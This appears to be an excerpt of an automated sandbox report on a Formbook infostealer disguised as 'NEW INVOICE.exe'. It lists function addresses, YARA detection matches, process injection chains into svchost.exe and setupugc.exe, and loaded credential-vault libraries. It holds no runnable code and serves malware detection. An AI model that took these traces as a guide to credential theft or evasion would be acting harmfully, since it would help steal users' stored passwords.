            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D30C005_2_02D30C00
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D2ADE05_2_02D2ADE0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D48DBF5_2_02D48DBF
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DCCD1F5_2_02DCCD1F
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D3AD005_2_02D3AD00
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D4B2C05_2_02D4B2C0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DD12ED5_2_02DD12ED
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D352A05_2_02D352A0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D7739A5_2_02D7739A
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D1D34C5_2_02D1D34C
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DE132D5_2_02DE132D
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DDF0CC5_2_02DDF0CC
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D370C05_2_02D370C0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DE70E95_2_02DE70E9
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DEF0E05_2_02DEF0E0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D3B1B05_2_02D3B1B0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D1F1725_2_02D1F172
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DFB16B5_2_02DFB16B
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D6516C5_2_02D6516C
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DE16CC5_2_02DE16CC
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D756305_2_02D75630
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DEF7B05_2_02DEF7B0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D214605_2_02D21460
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DEF43F5_2_02DEF43F
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DF95C35_2_02DF95C3
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DCD5B05_2_02DCD5B0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DE75715_2_02DE7571
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DDDAC65_2_02DDDAC6
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DCDAAC5_2_02DCDAAC
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D75AA05_2_02D75AA0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DD1AA35_2_02DD1AA3
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DEFA495_2_02DEFA49
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DE7A465_2_02DE7A46
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DA3A6C5_2_02DA3A6C
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DA5BF05_2_02DA5BF0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D6DBF95_2_02D6DBF9
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D4FB805_2_02D4FB80
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DEFB765_2_02DEFB76
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D338E05_2_02D338E0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D9D8005_2_02D9D800
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D399505_2_02D39950
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D4B9505_2_02D4B950
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DC59105_2_02DC5910
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D39EB05_2_02D39EB0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02CF3FD55_2_02CF3FD5
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02CF3FD25_2_02CF3FD2
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D31F925_2_02D31F92
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DEFFB15_2_02DEFFB1
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DEFF095_2_02DEFF09
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DEFCF25_2_02DEFCF2
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DA9C325_2_02DA9C32
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D4FDC05_2_02D4FDC0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DE1D5A5_2_02DE1D5A
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02D33D405_2_02D33D40
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02DE7D735_2_02DE7D73
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_003615205_2_00361520
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_0035C4305_2_0035C430
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_0035C6505_2_0035C650
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_0035A6D05_2_0035A6D0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_00364BD05_2_00364BD0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_00362DB05_2_00362DB0
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_0037B2505_2_0037B250
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02BFE3245_2_02BFE324
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02BFE7E45_2_02BFE7E4
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02C0541C5_2_02C0541C
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02BFE4435_2_02BFE443
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: 5_2_02BFD8485_2_02BFD848
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: String function: 02D9EA12 appears 86 times
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: String function: 02D65130 appears 58 times
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: String function: 02DAF290 appears 105 times
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: String function: 02D1B970 appears 280 times
            Source: C:\Windows\SysWOW64\setupugc.exeCode function: String function: 02D77E54 appears 111 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0332B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 033BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03375130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 033AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03387E54 appears 111 times
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: String function: 00445975 appears 65 times
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: String function: 0041171A appears 37 times
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: String function: 0041718C appears 45 times
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: String function: 0040E6D0 appears 35 times
            Source: NEW INVOICE.exe, 00000000.00000003.2059375030.00000000047B3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs NEW INVOICE.exe
            Source: NEW INVOICE.exe, 00000000.00000003.2060753924.000000000495D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs NEW INVOICE.exe
            Source: NEW INVOICE.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2398520364.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3879199924.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2398092266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3879108456.0000000002950000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.2399026834.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000006.00000002.3882462274.0000000005240000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.3878504026.0000000000350000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3880668788.0000000003100000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@11/7
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_0044AF5C GetLastError,FormatMessageW,0_2_0044AF5C
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_00464422 OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,0_2_00464422
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004364AA
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_0045D517 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode,0_2_0045D517
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_0043701F CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle,0_2_0043701F
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_0047A999 OleInitialize,CLSIDFromProgID,CoCreateInstance,CoInitializeSecurity,_memset,_wcslen,_memset,CoCreateInstanceEx,CoSetProxyBlanket,0_2_0047A999
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_0043614F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,0_2_0043614F
            Source: C:\Users\user\Desktop\NEW INVOICE.exeFile created: C:\Users\user\AppData\Local\Temp\GraffJump to behavior
            Source: NEW INVOICE.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\NEW INVOICE.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\NEW INVOICE.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: setupugc.exe, 00000005.00000002.3879319331.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000005.00000002.3879319331.0000000002ADD000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000005.00000003.2581282479.0000000002AD4000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000005.00000002.3879319331.0000000002AD4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: NEW INVOICE.exeReversingLabs: Detection: 23%
            Source: C:\Users\user\Desktop\NEW INVOICE.exeFile read: C:\Users\user\Desktop\NEW INVOICE.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\NEW INVOICE.exe "C:\Users\user\Desktop\NEW INVOICE.exe"
            Source: C:\Users\user\Desktop\NEW INVOICE.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\NEW INVOICE.exe"
            Source: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exeProcess created: C:\Windows\SysWOW64\setupugc.exe "C:\Windows\SysWOW64\setupugc.exe"
            Source: C:\Windows\SysWOW64\setupugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\NEW INVOICE.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\NEW INVOICE.exe"Jump to behavior
            Source: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exeProcess created: C:\Windows\SysWOW64\setupugc.exe "C:\Windows\SysWOW64\setupugc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\NEW INVOICE.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\NEW INVOICE.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\NEW INVOICE.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\NEW INVOICE.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\NEW INVOICE.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\Desktop\NEW INVOICE.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\NEW INVOICE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\NEW INVOICE.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\NEW INVOICE.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\NEW INVOICE.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\NEW INVOICE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: wdscore.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\nhuQDukfxHXGWhwtjJOqrpWOlxgWwSjfnzfxZdQbltYAzdV\iLyDwpUmDRByL.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\NEW INVOICE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: NEW INVOICE.exeStatic file information: File size 1331957 > 1048576
            Source: Binary string: setupugc.pdb source: svchost.exe, 00000002.00000003.2366219045.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2366272278.0000000002C5B000.00000004.00000020.00020000.00000000.sdmp, iLyDwpUmDRByL.exe, 00000004.00000002.3879594021.0000000001328000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: iLyDwpUmDRByL.exe, 00000004.00000000.2323994616.00000000002DE000.00000002.00000001.01000000.00000005.sdmp, iLyDwpUmDRByL.exe, 00000006.00000000.2470784751.00000000002DE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: NEW INVOICE.exe, 00000000.00000003.2060753924.0000000004830000.00000004.00001000.00020000.00000000.sdmp, NEW INVOICE.exe, 00000000.00000003.2061001226.0000000004690000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2398560256.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310891301.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2309140089.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2398560256.000000000349E000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000005.00000002.3880925100.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000005.00000002.3880925100.0000000002E8E000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000005.00000003.2398473399.0000000002853000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000005.00000003.2401133467.0000000002B45000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: NEW INVOICE.exe, 00000000.00000003.2060753924.0000000004830000.00000004.00001000.00020000.00000000.sdmp, NEW INVOICE.exe, 00000000.00000003.2061001226.0000000004690000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2398560256.0000000003300000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310891301.0000000003100000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2309140089.0000000002F00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2398560256.000000000349E000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, setupugc.exe, 00000005.00000002.3880925100.0000000002CF0000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000005.00000002.3880925100.0000000002E8E000.00000040.00001000.00020000.00000000.sdmp, setupugc.exe, 00000005.00000003.2398473399.0000000002853000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000005.00000003.2401133467.0000000002B45000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: setupugc.exe, 00000005.00000002.3879319331.0000000002A55000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000005.00000002.3882121944.000000000331C000.00000004.10000000.00040000.00000000.sdmp, iLyDwpUmDRByL.exe, 00000006.00000000.2471295217.0000000002E0C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2691444690.000000002AF0C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: setupugc.exe, 00000005.00000002.3879319331.0000000002A55000.00000004.00000020.00020000.00000000.sdmp, setupugc.exe, 00000005.00000002.3882121944.000000000331C000.00000004.10000000.00040000.00000000.sdmp, iLyDwpUmDRByL.exe, 00000006.00000000.2471295217.0000000002E0C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2691444690.000000002AF0C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: setupugc.pdbGCTL source: svchost.exe, 00000002.00000003.2366219045.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2366272278.0000000002C5B000.00000004.00000020.00020000.00000000.sdmp, iLyDwpUmDRByL.exe, 00000004.00000002.3879594021.0000000001328000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_0040EB70 LoadLibraryA,GetProcAddress,0_2_0040EB70
            Source: NEW INVOICE.exeStatic PE information: real checksum: 0xa2135 should be: 0x14e885
            Source: C:\Users\user\Desktop\NEW INVOICE.exeCode function: 0_2_004171D1 push ecx; ret 0_2_004171E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040187F push esi; iretd 2_2_00401897
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00405087 push es; ret 2_2_00405089
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040515B pushad ; ret 2_2_0040516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D109 push edx; retf 2_2_0040D145
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041991B push ds; iretd 2_2_0041991F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040512C push ecx; ret 2_2_0040512D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A1C3 push ebp; iretd 2_2_0041A1C4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E1E9 push edi; retf 2_2_0041E1F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041A252 push ds; iretd 2_2_0041A255
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040AA5D push esi; iretd 2_2_0040AA6D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040AA63 push esi; iretd 2_2_0040AA6D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041E277 push E6438933h; iretd 2_2_0041E27C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00415A33 push esi; ret 2_2_00415AEB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041131D push ebp; retf 2_2_0041132C
